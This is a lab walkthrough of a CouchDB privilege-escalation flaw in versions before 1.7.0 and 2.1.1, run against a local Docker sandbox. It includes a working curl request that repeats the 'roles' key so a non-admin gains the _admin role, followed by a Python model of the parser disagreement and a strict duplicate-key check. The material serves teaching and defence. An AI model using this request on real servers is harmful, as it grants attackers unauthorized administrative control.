- Apache CouchDB is a document-oriented NoSQL database, implemented in Erlang.
- Because the Erlang-based JSON parser and the JavaScript-based JSON parser disagree on how to handle duplicate keys, CouchDB before 1.7.0 and 2.x before 2.1.1 allowed non-admin users to escalate privilege by submitting _users documents with duplicate roles keys. The roles key is used for access control within the databases and may hold the special _admin role, which denotes administrative users.
To recap, the vulnerability allows non-admin users to give themselves admin privileges.
- CouchDB uses a special database (called _users by default) to store information about registered users. This is a system database: while it shares the common database API, some special security-related constraints apply to it and there are agreed conventions on document structure.
Only administrators may GET, PUT or DELETE any document in the _users database.
Users may only access (GET /_users/org.couchdb.user:<username>) or modify (PUT /_users/org.couchdb.user:<username>) the documents that they own.
Run the Docker image (CouchDB 1.6.1, which is in the affected range):
docker container run -d --name couchdb-sandbox -p 5984:5984 couchdb:1.6.1
Check that the CouchDB instance is up and responding:
curl -X GET http://localhost:5984
Query: List all databases in the instance
curl -X GET http://localhost:5984/_all_dbs
Query: Create an admin account with credentials admin:admin
curl -X PUT http://localhost:5984/_config/admins/admin -d '"admin"'
Query: Try to create a new database named records without authentication
curl -X PUT http://localhost:5984/records
This fails: now that an admin exists, unauthenticated users can no longer create databases.
Query: Create a new database named records with admin authentication
curl -X PUT http://admin:admin@localhost:5984/records
Query: Try to create a new user document in the _users database with the _admin role
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
  -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -d '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'
This is rejected: a non-admin user cannot create an account with the _admin role.
Query: Create the same document in the _users database, this time with a duplicate roles key
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
  -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -d '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'
The document is accepted: the validation step sees the second, empty roles value, while the stored document keeps the first one. We have an admin account now!
Query: Create a new database named new_records with guest authentication
curl -X PUT http://guest:guest@localhost:5984/new_records
Query: Delete the database named new_records with guest authentication
curl -X DELETE http://guest:guest@localhost:5984/new_records
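The duplicate-key request above only works because two parsers disagree about which "roles" value counts. The following added example (not CouchDB code, and not part of the original walkthrough) models that disagreement in Python as a first-key-wins parser versus a last-key-wins parser, and shows the defensive fix: refuse any _users document whose JSON repeats a key before performing any role check. Which side keeps which value is an assumption of this model; the sample document is constructed from the request shown above.

```python
import json

# Constructed sample: the _users document from the walkthrough, with "roles" given twice.
DUPLICATE_ROLES_DOC = (
    '{"name": "guest", "password": "guest", '
    '"roles": ["_admin"], "roles": [], "type": "user"}'
)


class DuplicateKeyError(ValueError):
    """Raised when a JSON object repeats a key."""


def _first_wins(pairs):
    # Keep the first value for each key. Models a proplist-style lookup that
    # returns the first match (assumed behaviour of the storage side).
    out = {}
    for key, value in pairs:
        out.setdefault(key, value)
    return out


def _last_wins(pairs):
    # Keep the last value for each key. This is what JSON.parse and json.loads
    # do by default (assumed behaviour of the validation side).
    return dict(pairs)


def _strict(pairs):
    # Refuse the document outright instead of silently picking one value.
    out = {}
    for key, value in pairs:
        if key in out:
            raise DuplicateKeyError(key)
        out[key] = value
    return out


def roles_seen_by(doc_text, policy):
    """Return the roles list that a first-wins or last-wins parser would see."""
    hook = {"first": _first_wins, "last": _last_wins}[policy]
    return json.loads(doc_text, object_pairs_hook=hook).get("roles", [])


def audit_users_doc(doc_text):
    """Defensive check for a _users document submitted by a non-admin.
    Reject duplicate keys first, then apply the role check that the validator performs."""
    try:
        doc = json.loads(doc_text, object_pairs_hook=_strict)
    except DuplicateKeyError as e:
        return f"reject: duplicate key {e.args[0]!r}"
    if "_admin" in doc.get("roles", []):
        return "reject: non-admin may not assign _admin"
    return "ok"
```

Run against the sample document, the last-wins view reports no roles (so a validator using it lets the request through) while the first-wins view reports ["_admin"]; the strict audit rejects the document before either view matters.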